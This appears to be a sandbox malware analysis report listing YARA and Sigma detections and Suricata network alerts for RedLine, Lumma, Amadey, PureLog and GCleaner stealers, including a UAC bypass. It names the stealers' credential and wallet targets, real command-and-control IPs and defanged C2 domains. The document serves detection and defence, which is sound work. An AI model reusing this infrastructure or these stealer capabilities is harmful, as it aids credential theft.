31.2.ViGgA8C.exe.e10000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x137ca:$a4: get_ScannedWallets 0x12628:$a5: get_ScanTelegram 0x1344e:$a6: get_ScanGeckoBrowsersPaths 0x1126a:$a7: <Processes>k__BackingField 0xf17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x10b9e:$a9: <ScanFTP>k__BackingField
31.2.ViGgA8C.exe.e10000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x11bcb:$gen01: ChromeGetRoamingName 0x11bff:$gen02: ChromeGetLocalName 0x11c28:$gen03: get_UserDomainName 0x13e67:$gen04: get_encrypted_key 0x133e3:$gen05: browserPaths 0x1372b:$gen06: GetBrowsers 0x13061:$gen07: get_InstalledInputLanguages 0x1084f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9318:$spe6: windows-1251, CommandLine: 0x145bd:$spe9: wallet 0xf00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xf107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xf098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xf0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
31.2.ViGgA8C.exe.e10000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1068a:$u7: RunPE 0x13d41:$u8: DownloadAndEx 0x9330:$pat14: , CommandLine: 0x13279:$v2_1: ListOfProcesses 0x1088b:$v2_2: get_ScanVPN 0x1092e:$v2_2: get_ScanFTP 0x1161e:$v2_2: get_ScanDiscord 0x1260c:$v2_2: get_ScanSteam 0x12628:$v2_2: get_ScanTelegram 0x126ce:$v2_2: get_ScanScreen 0x13416:$v2_2: get_ScanChromeBrowsersPaths 0x1344e:$v2_2: get_ScanGeckoBrowsersPaths 0x13709:$v2_2: get_ScanBrowsers 0x137ca:$v2_2: get_ScannedWallets 0x137f0:$v2_2: get_ScanWallets 0x13810:$v2_3: GetArguments 0x11ed9:$v2_4: VerifyUpdate 0x167ea:$v2_4: VerifyUpdate 0x13bca:$v2_5: VerifyScanRequest 0x132c6:$v2_6: GetUpdates 0x167cb:$v2_6: GetUpdates
23.2.d755f09e83.exe.820000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
26.2.BitLockerToGo.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
10.2.xkV9ZML.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
27.2.14b550e5e3.exe.df28000.3.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
30.2.6761aae677.exe.ea80000.2.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
28.2.KbSwZup.exe.d60000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
13.3.b7b5e2e140.exe.a7c0000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
24.2.976cb97ff6.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.976cb97ff6.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x12600:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x126a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x12770:$s2: Elevation:Administrator!new:
30.2.6761aae677.exe.eaac000.1.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
13.3.b7b5e2e140.exe.a7c0000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
13.3.b7b5e2e140.exe.a770000.1.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
13.2.b7b5e2e140.exe.a7c0000.4.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
35.2.BitLockerToGo.exe.400000.0.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
23.2.d755f09e83.exe.aeb000.1.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
27.2.14b550e5e3.exe.df54000.4.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
10.2.xkV9ZML.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
35.2.BitLockerToGo.exe.400000.0.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
27.2.14b550e5e3.exe.df80000.1.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
14.2.4dfe6dfd76.exe.3e39550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.4dfe6dfd76.exe.3e39550.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
23.2.d755f09e83.exe.aeb000.1.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
27.2.14b550e5e3.exe.dfac000.2.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0.2.1w5RpHuliE.exe.ed0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
13.2.b7b5e2e140.exe.a7c0000.4.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
19.2.4dfe6dfd76.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
23.0.d755f09e83.exe.820000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
14.2.4dfe6dfd76.exe.3e39550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.4dfe6dfd76.exe.950000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.b7b5e2e140.exe.a70a000.2.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.skotes.exe.6f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
13.3.b7b5e2e140.exe.a770000.1.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
7.2.xkV9ZML.exe.3919550.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
25.2.cbf2b6294a.exe.580000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
19.2.4dfe6dfd76.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
6.2.skotes.exe.6f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.skotes.exe.6f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.2.b4fe2af6b4.exe.520000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Click to see the 44 entries

Sigma Signatures

System Summary

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 2672, ProcessName: svchost.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:09.736242+0100	2028371	3	Unknown Traffic	192.168.2.5	49954	188.114.96.3	443	TCP
2025-02-13T10:35:10.467014+0100	2028371	3	Unknown Traffic	192.168.2.5	49959	188.114.96.3	443	TCP
2025-02-13T10:35:11.621319+0100	2028371	3	Unknown Traffic	192.168.2.5	49967	188.114.96.3	443	TCP
2025-02-13T10:35:12.809257+0100	2028371	3	Unknown Traffic	192.168.2.5	49981	188.114.96.3	443	TCP
2025-02-13T10:35:14.954069+0100	2028371	3	Unknown Traffic	192.168.2.5	49987	188.114.96.3	443	TCP
2025-02-13T10:35:20.636379+0100	2028371	3	Unknown Traffic	192.168.2.5	49993	188.114.96.3	443	TCP
2025-02-13T10:35:21.940699+0100	2028371	3	Unknown Traffic	192.168.2.5	49995	188.114.96.3	443	TCP
2025-02-13T10:35:24.098368+0100	2028371	3	Unknown Traffic	192.168.2.5	50000	188.114.96.3	443	TCP
2025-02-13T10:35:25.882374+0100	2028371	3	Unknown Traffic	192.168.2.5	50001	188.114.96.3	443	TCP
2025-02-13T10:35:26.552381+0100	2028371	3	Unknown Traffic	192.168.2.5	50002	188.114.96.3	443	TCP
2025-02-13T10:35:27.256055+0100	2028371	3	Unknown Traffic	192.168.2.5	50005	188.114.96.3	443	TCP
2025-02-13T10:35:27.955670+0100	2028371	3	Unknown Traffic	192.168.2.5	50008	188.114.96.3	443	TCP
2025-02-13T10:35:28.600485+0100	2028371	3	Unknown Traffic	192.168.2.5	50009	188.114.96.3	443	TCP
2025-02-13T10:35:32.902313+0100	2028371	3	Unknown Traffic	192.168.2.5	50011	104.73.234.102	443	TCP
2025-02-13T10:35:34.071330+0100	2028371	3	Unknown Traffic	192.168.2.5	50013	172.67.183.104	443	TCP
2025-02-13T10:35:34.718979+0100	2028371	3	Unknown Traffic	192.168.2.5	50014	172.67.183.104	443	TCP
2025-02-13T10:35:35.465358+0100	2028371	3	Unknown Traffic	192.168.2.5	50015	172.67.183.104	443	TCP
2025-02-13T10:35:36.169733+0100	2028371	3	Unknown Traffic	192.168.2.5	50016	172.67.183.104	443	TCP
2025-02-13T10:35:36.793466+0100	2028371	3	Unknown Traffic	192.168.2.5	50017	172.67.183.104	443	TCP
2025-02-13T10:35:47.466078+0100	2028371	3	Unknown Traffic	192.168.2.5	50022	172.67.155.64	443	TCP
2025-02-13T10:35:48.159016+0100	2028371	3	Unknown Traffic	192.168.2.5	50024	172.67.155.64	443	TCP
2025-02-13T10:35:49.482692+0100	2028371	3	Unknown Traffic	192.168.2.5	50026	172.67.155.64	443	TCP
2025-02-13T10:35:51.544512+0100	2028371	3	Unknown Traffic	192.168.2.5	50027	172.67.155.64	443	TCP
2025-02-13T10:35:52.877945+0100	2028371	3	Unknown Traffic	192.168.2.5	50028	172.67.155.64	443	TCP
2025-02-13T10:35:54.987172+0100	2028371	3	Unknown Traffic	192.168.2.5	50030	172.67.155.64	443	TCP
2025-02-13T10:35:56.477624+0100	2028371	3	Unknown Traffic	192.168.2.5	50032	172.67.155.64	443	TCP
2025-02-13T10:35:58.654051+0100	2028371	3	Unknown Traffic	192.168.2.5	50033	172.67.155.64	443	TCP
2025-02-13T10:35:59.385115+0100	2028371	3	Unknown Traffic	192.168.2.5	50034	104.102.49.254	443	TCP
2025-02-13T10:36:01.170826+0100	2028371	3	Unknown Traffic	192.168.2.5	50037	172.67.155.64	443	TCP
2025-02-13T10:36:02.017652+0100	2028371	3	Unknown Traffic	192.168.2.5	50038	172.67.155.64	443	TCP
2025-02-13T10:36:03.483141+0100	2028371	3	Unknown Traffic	192.168.2.5	50039	172.67.155.64	443	TCP
2025-02-13T10:36:05.462453+0100	2028371	3	Unknown Traffic	192.168.2.5	50040	172.67.155.64	443	TCP
2025-02-13T10:36:07.269236+0100	2028371	3	Unknown Traffic	192.168.2.5	50041	172.67.155.64	443	TCP
2025-02-13T10:36:09.594832+0100	2028371	3	Unknown Traffic	192.168.2.5	50045	172.67.155.64	443	TCP
2025-02-13T10:36:11.913351+0100	2028371	3	Unknown Traffic	192.168.2.5	50046	172.67.155.64	443	TCP
2025-02-13T10:36:14.100393+0100	2028371	3	Unknown Traffic	192.168.2.5	50048	172.67.155.64	443	TCP
2025-02-13T10:36:33.605964+0100	2028371	3	Unknown Traffic	192.168.2.5	50060	104.21.90.173	443	TCP
2025-02-13T10:36:33.658635+0100	2028371	3	Unknown Traffic	192.168.2.5	50061	188.114.96.3	443	TCP
2025-02-13T10:36:34.343911+0100	2028371	3	Unknown Traffic	192.168.2.5	50063	104.21.90.173	443	TCP
2025-02-13T10:36:34.610137+0100	2028371	3	Unknown Traffic	192.168.2.5	50064	188.114.96.3	443	TCP
2025-02-13T10:36:37.418911+0100	2028371	3	Unknown Traffic	192.168.2.5	50066	188.114.96.3	443	TCP
2025-02-13T10:36:37.921549+0100	2028371	3	Unknown Traffic	192.168.2.5	50067	104.21.90.173	443	TCP
2025-02-13T10:36:38.765962+0100	2028371	3	Unknown Traffic	192.168.2.5	50068	188.114.96.3	443	TCP
2025-02-13T10:36:39.433567+0100	2028371	3	Unknown Traffic	192.168.2.5	50069	104.21.90.173	443	TCP
2025-02-13T10:36:40.859303+0100	2028371	3	Unknown Traffic	192.168.2.5	50070	104.21.90.173	443	TCP
2025-02-13T10:36:44.581396+0100	2028371	3	Unknown Traffic	192.168.2.5	50071	188.114.96.3	443	TCP
2025-02-13T10:36:45.910645+0100	2028371	3	Unknown Traffic	192.168.2.5	50072	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:09.968751+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49954	188.114.96.3	443	TCP
2025-02-13T10:35:10.953731+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49959	188.114.96.3	443	TCP
2025-02-13T10:35:24.581805+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50000	188.114.96.3	443	TCP
2025-02-13T10:35:26.050025+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50001	188.114.96.3	443	TCP
2025-02-13T10:35:26.699483+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50002	188.114.96.3	443	TCP
2025-02-13T10:35:28.740840+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50009	188.114.96.3	443	TCP
2025-02-13T10:35:34.204772+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50013	172.67.183.104	443	TCP
2025-02-13T10:35:34.853584+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50014	172.67.183.104	443	TCP
2025-02-13T10:35:36.938911+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50017	172.67.183.104	443	TCP
2025-02-13T10:35:47.614141+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50022	172.67.155.64	443	TCP
2025-02-13T10:35:48.634880+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50024	172.67.155.64	443	TCP
2025-02-13T10:35:59.009865+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50033	172.67.155.64	443	TCP
2025-02-13T10:36:01.343908+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50037	172.67.155.64	443	TCP
2025-02-13T10:36:02.530871+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50038	172.67.155.64	443	TCP
2025-02-13T10:36:14.659249+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50048	172.67.155.64	443	TCP
2025-02-13T10:36:33.744454+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50060	104.21.90.173	443	TCP
2025-02-13T10:36:33.806706+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50061	188.114.96.3	443	TCP
2025-02-13T10:36:34.815506+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50063	104.21.90.173	443	TCP
2025-02-13T10:36:35.125434+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50064	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:09.968751+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49954	188.114.96.3	443	TCP
2025-02-13T10:35:26.050025+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50001	188.114.96.3	443	TCP
2025-02-13T10:35:34.204772+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50013	172.67.183.104	443	TCP
2025-02-13T10:35:47.614141+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50022	172.67.155.64	443	TCP
2025-02-13T10:36:01.343908+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50037	172.67.155.64	443	TCP
2025-02-13T10:36:33.744454+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50060	104.21.90.173	443	TCP
2025-02-13T10:36:33.806706+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50061	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:10.953731+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49959	188.114.96.3	443	TCP
2025-02-13T10:35:26.699483+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50002	188.114.96.3	443	TCP
2025-02-13T10:35:34.853584+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50014	172.67.183.104	443	TCP
2025-02-13T10:35:48.634880+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50024	172.67.155.64	443	TCP
2025-02-13T10:36:02.530871+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50038	172.67.155.64	443	TCP
2025-02-13T10:36:34.815506+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50063	104.21.90.173	443	TCP
2025-02-13T10:36:35.125434+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50064	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:25.882374+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.5	50001	188.114.96.3	443	TCP
2025-02-13T10:35:26.552381+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.5	50002	188.114.96.3	443	TCP
2025-02-13T10:35:27.256055+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.5	50005	188.114.96.3	443	TCP
2025-02-13T10:35:27.955670+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.5	50008	188.114.96.3	443	TCP
2025-02-13T10:35:28.600485+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.5	50009	188.114.96.3	443	TCP

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:36:27.975771+0100	2045000	1	Malware Command and Control Activity Detected	103.84.89.222	33791	192.168.2.5	50051	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:11.264345+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49963	185.215.113.43	80	TCP
2025-02-13T10:35:22.516915+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49996	185.215.113.43	80	TCP
2025-02-13T10:35:27.152324+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50004	185.215.113.43	80	TCP
2025-02-13T10:35:32.906494+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50010	185.215.113.43	80	TCP
2025-02-13T10:35:37.323362+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50018	185.215.113.43	80	TCP
2025-02-13T10:35:42.835306+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50020	185.215.113.43	80	TCP
2025-02-13T10:35:48.208678+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50023	185.215.113.43	80	TCP
2025-02-13T10:35:55.111950+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50029	185.215.113.43	80	TCP
2025-02-13T10:36:00.544689+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50035	185.215.113.43	80	TCP
2025-02-13T10:36:07.780947+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50043	185.215.113.43	80	TCP
2025-02-13T10:36:13.084363+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50047	185.215.113.43	80	TCP
2025-02-13T10:36:24.257029+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50053	185.215.113.43	80	TCP
2025-02-13T10:36:28.460419+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50055	185.215.113.43	80	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:34:10.276862+0100	2045001	1	Malware Command and Control Activity Detected	103.84.89.222	33791	192.168.2.5	50051	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (actiothreaz .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:32.177387+0100	2059907	1	Domain Observed Used for C2 Detected	192.168.2.5	58042	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (affordtempyo .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:58.623753+0100	2059435	1	Domain Observed Used for C2 Detected	192.168.2.5	65401	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (breedertremnd .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:32.201352+0100	2059911	1	Domain Observed Used for C2 Detected	192.168.2.5	49339	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (garulouscuto .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:32.188784+0100	2059915	1	Domain Observed Used for C2 Detected	192.168.2.5	53425	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hoursuhouy .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:58.595664+0100	2059429	1	Domain Observed Used for C2 Detected	192.168.2.5	63884	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ignoredshee .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:09.193161+0100	2059987	1	Domain Observed Used for C2 Detected	192.168.2.5	62632	1.1.1.1	53	UDP
2025-02-13T10:36:33.139485+0100	2059987	1	Domain Observed Used for C2 Detected	192.168.2.5	50692	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:58.538212+0100	2059421	1	Domain Observed Used for C2 Detected	192.168.2.5	55620	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (importenptoc .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:09.208122+0100	2059919	1	Domain Observed Used for C2 Detected	192.168.2.5	54022	1.1.1.1	53	UDP
2025-02-13T10:35:32.086313+0100	2059919	1	Domain Observed Used for C2 Detected	192.168.2.5	58514	1.1.1.1	53	UDP
2025-02-13T10:36:33.153836+0100	2059919	1	Domain Observed Used for C2 Detected	192.168.2.5	52627	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inputrreparnt .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:32.139900+0100	2059921	1	Domain Observed Used for C2 Detected	192.168.2.5	64632	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lightdeerysua .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:58.566409+0100	2059425	1	Domain Observed Used for C2 Detected	192.168.2.5	65209	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mixedrecipew .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:58.609908+0100	2059431	1	Domain Observed Used for C2 Detected	192.168.2.5	59646	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (paleboreei .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:25.393363+0100	2059925	1	Domain Observed Used for C2 Detected	192.168.2.5	63327	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pleasedcfrown .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:58.637686+0100	2059433	1	Domain Observed Used for C2 Detected	192.168.2.5	52958	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:32.071055+0100	2059927	1	Domain Observed Used for C2 Detected	192.168.2.5	49400	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (suggestyuoz .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:58.580495+0100	2059427	1	Domain Observed Used for C2 Detected	192.168.2.5	52248	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:58.552451+0100	2059771	1	Domain Observed Used for C2 Detected	192.168.2.5	55241	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (torpdidebar .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:32.152824+0100	2059931	1	Domain Observed Used for C2 Detected	192.168.2.5	62135	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (voicesharped .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:32.126900+0100	2059933	1	Domain Observed Used for C2 Detected	192.168.2.5	60555	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:21.095200+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49993	188.114.96.3	443	TCP
2025-02-13T10:35:35.576133+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50015	172.67.183.104	443	TCP
2025-02-13T10:35:52.115402+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50027	172.67.155.64	443	TCP
2025-02-13T10:36:40.059955+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50069	104.21.90.173	443	TCP
2025-02-13T10:36:45.333205+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50071	188.114.96.3	443	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:04.721126+0100	2856147	1	A Network Trojan was detected	192.168.2.5	49915	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:10.566108+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	49931	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-13T10:35:07.777582+0100	2803305	3	Unknown Traffic	192.168.2.5	49937	185.215.113.75	80	TCP
2025-02-13T10:35:11.972606+0100	2803305	3	Unknown Traffic	192.168.2.5	49971	185.215.113.75	80	TCP
2025-02-13T10:35:23.333548+0100	2803305	3	Unknown Traffic	192.168.2.5	49999	185.215.113.75	80	TCP
2025-02-13T10:35:27.870681+0100	2803305	3	Unknown Traffic	192.168.2.5	50006	185.215.113.75	80	TCP
